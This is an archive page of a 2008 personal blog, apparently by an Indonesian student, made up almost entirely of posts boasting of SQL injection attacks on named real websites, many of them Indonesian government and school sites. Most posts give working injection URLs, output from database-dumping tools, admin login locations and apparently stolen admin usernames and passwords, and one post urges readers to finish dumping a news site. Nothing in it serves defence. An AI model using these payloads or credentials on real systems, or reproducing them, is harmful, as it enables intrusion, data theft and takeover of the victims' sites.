Tool: schemafuzz.py v5.0[+] URL:http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,sqli,2,3,4--[+] Evasion Used: "+" "--"[+] 17:19:39[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: seaedunet_db User: seaedunet@localhost Version: 5.0.32-Debian_7etch6-log[+] Do we have Access to MySQL Database: Yes <-- w00t w00t[!] http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4+FROM+mysql.user--[+]...
Wednesday, October 29, 2008
Monday, October 27, 2008
Here in Australia...
Wow man, everyday is a busy day. Moving to another country is not an easy task for me. With an "unhuman" weather, i've already got sicked these days, sore throat and runny nose.So, here in Australia, I can easily do hacking stuff like in Indonesia. I try to "play safe" and not ruin my permit to study here. In here, I can't download as much as i did in Indonesia (poor me). I think Indonesia is better...
Wednesday, October 15, 2008
[SQLi] http://sman1-boyolali.com
Tool --> schemafuzz.py v5.0Admin login page --> http://sman1-boyolali.com/admin/Admin usr:pwd --> admin:mastar1234Dump:[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--[+] Evasion Used: "+" "--"[+] 12:40:16[+] Proxy Not Given[+] Gathering MySQL...
[SQLi] http://www.buturnews.idrap.or.id
Tool --> blindext.py v5.0User login --> buturnews:banda1302 (see else in dump)Dump:[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62[+] Proxy Not Given[+] Gathering MySQL Server Configuration... [+] MySQL >= v5.0.0 found![+] Showing Tables from database "t79166_dbbutur"[+] 10:12:30[+]...
[SQLi] http://www.jiwasraya.co.id
Admin login page --> http://www.jiwasraya.co.id/admin/Admin usr:pwd --> admin:ari1007 (see else in dump)Dump:[+] URL:http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+sqli--[+] Evasion Used: "+" "--"[+] 09:51:11[+] Proxy Not Given[+] Gathering MySQL Server Configuration......
[SQLi] http://mobile.kompas.com
I try to get the full schema of kompas.com but i'm too tired, and it's too many. If you're so eager to "hack", try to get them all :)Info:[+] URL:http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3/*[+] Evasion Used: "/**/" "/*"[+] 17:59:19[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: kompasmobile User: megadb@10.50.12.196 Version:...
Tuesday, October 14, 2008
[SQLi] http://www.gontha.com/
Tool --> schemafuzz.py v5.0Admin login page --> http://www.gontha.com/admin/Admin usr:pwd --> sai:saimanDump:[+] URL:http://www.gontha.com/photo.php?action=detail&mode=viewphoto&cid=24&idalbum=13+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--[+] Evasion Used: "+" "--"[+] 18:57:14[+]...
[SQLi] http://golkar.go.id
Tool --> schemafuzz v5.0Dump:[+] URL:http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+sqli,1,2,3--[+] Evasion Used: "+" "--"[+] 13:14:02[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: golkar_pusat User: golkar_pusat@202.43.163.198 Version: 5.0.51a-3ubuntu5.1[+] Do we have Access to MySQL Database: Yes <-- w00t w00t[!] http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+0,1,concat(user,0x3a,password),3+FROM+mysql.user--[+]...
[SQLi] http://en.agrimedia.com/
Tool --> schemafuzz.py v5.0Admin login page --> http://en.agrimedia.com/admin/Admin usr:login --> admin:agri8z3 (see else in dump)Dump:[+] URL:http://en.agrimedia.com/libfeed/shop/detail.php?id=246'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7,8,9,10,11,12,13/*[+] Evasion Used: "/**/"...
[SQLi] http://www.theperfusionstore.com/
Admin login page --> http://www.theperfusionstore.com/admin/Admin usr:pwd --> admin:p3rfusionDump:[+] URL:http://www.theperfusionstore.com/shop/detail.php?cat=4&ID=13+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--[+] Evasion Used: "+" "--"[+] 20:30:50[+]...
[SQLi] http://www.racewithfaith.com
Tool: schemafuzz.py v5.0Admin login page --> http://www.racewithfaith.com/admin/Admi:n usr:pwd --> dana:vr00mDump[+] URL:http://www.racewithfaith.com/newsdetail.php?ID=35+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8--[+] Evasion Used: "+" "--"[+] 20:12:07[+] Proxy Not Given[+] Gathering MySQL...
Monday, October 13, 2008
[SQLi] http://www.fiacona.org
Tool --> ManualAdmin login page --> http://www.fiacona.org/adminAdmin usr:pwd --> admin:tigersDatabase info: http://www.fiacona.org/category_index.php?catid=-95'+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20and%20'1'='2Dump: htt...
[SQLi] http://www.arabeuropean.org
Tool --> blindext.py v3.0 (blind SQL injection)Database info:[+] URL:http://www.arabeuropean.org/newsdetail.php?ID=94[+] Proxy Not Given[+] Gathering MySQL Server Configuration... [+] MySQL >= v4.0.0 found![+] Showing database version, username@location, and database name![+] 15:05:23[0]: 4.1.22-standard:harabe30_arabsen@localhost:harabe30_arabsengAdmin...
[SQLi] http://www.bainfokomsumut.go.id/
Tool --> schemafuzz.py v5.0Admin login page --> http://www.bainfokomsumut.go.id/Admin usr:pwd --> riza:milanistaDump:[+] URL:http://www.bainfokomsumut.go.id/detail.php?id=1634+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5--[+] Evasion Used: "+" "--"[+] 13:27:39[+] Proxy Not Given[+] Gathering MySQL Server...
[SQLi] http://ukbi.pusatbahasa.diknas.go.id
Tool --> schemafuzz.py v5.0 and instinct ^^Admin loc --> http://ukbi.pusatbahasa.diknas.go.id/admin_ukbi.phpAdmin usr:pwd --> ukbi:ukbi2007 (see more in above pic)Dump:[+] URL:http://ukbi.pusatbahasa.diknas.go.id/detail.php?id=29+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7--[+] Evasion Used:...
[SQLi] http://papua.litbang.deptan.go.id
Tool --> schemafuzz.py v5.0Admin loc --> http://papua.litbang.deptan.go.id/login.htmlAdmin usr:pwd --> admin:n0rm1 (see the others in dump or above pic)Dump:[+] URL:http://papua.litbang.deptan.go.id/detail.php?id=10+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7--[+] Evasion Used: "+" "--"[+] 12:58:37[+]...
[SQLi] http://www.azpsych.us/
PoC: http://www.azpsych.us/detailnews.php?id=44+AND+1=2+UNION+SELECT+0,user,password,3,4,5+from+admin--Info:Database: azpsyus_mainUser: azpsyus@localhostVersion: 5.0.51a-communityAdmin loc --> http://www.azpsych.us/admin/Admin usr:pwd --> admin:aztps...
[SQLi] http://inixindojogja.com/
Tool --> schemafuzz.py v5.0Admin loc --> http://inixindojogja.com/admin/Admin usr:pwd --> webadmin:webj0gja2006Dump:[+] URL:http://www.inixindojogja.com/detailnews.php?id=59+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7--[+] Evasion Used: "+" "--"[+] 21:40:40[+] Proxy Not Given[+] Gathering MySQL...
[SQLi] http://www.wiyoko.com
Tool --> schemafuzz.py v5.0Admin loc --> http://wiyoko.com/admin/index.phpAdmin usr:pwd --> admin:1111 (see others in the dump or above pic)Dump:[+] URL:http://wiyoko.com/detailnews.php?table=news&id=32+AND+1=2+UNION+SELECT+0,sqli,2,3,4--[+] Evasion Used: "+" "--"[+] 19:54:01[+] Proxy Not...
Sunday, October 12, 2008
http://smpn7-bpp.sch.id/
Tool --> brain and instinctAdmin loc --> http://smpn7-bpp.sch.id/admin/Admin usr:pwd --> admin:admin (carelessness is killing y...
[SQLi] http://www.icmcipanas.sch.id
Tool: schemafuzz.py v5.0Admin loc --> http://www.icmcipanas.sch.id/cpanel/admin.phpAdmin usr:pwd --> see above pic.Dump:[+] URL:http://www.icmcipanas.sch.id/news.php?p=detn&kode=46+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--[+] Evasion Used: "+" "--"[+] 21:22:53[+] Proxy Not Given[+] Gathering MySQL...
Saturday, October 11, 2008
[SQLi] http://qbheadlines.com
Tool --> schemafuzz.py v5.0Admin loc --> http://qbheadlines.com/admin/Admin usr:pwd --> admin:qb09db08 (see dump for more)Dump:[+] URL:http://qbheadlines.com/index.php?cat=5+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9--[+] Evasion Used: "+" "--"[+] 21:10:28[+] Proxy Not Given[+] Gathering MySQL...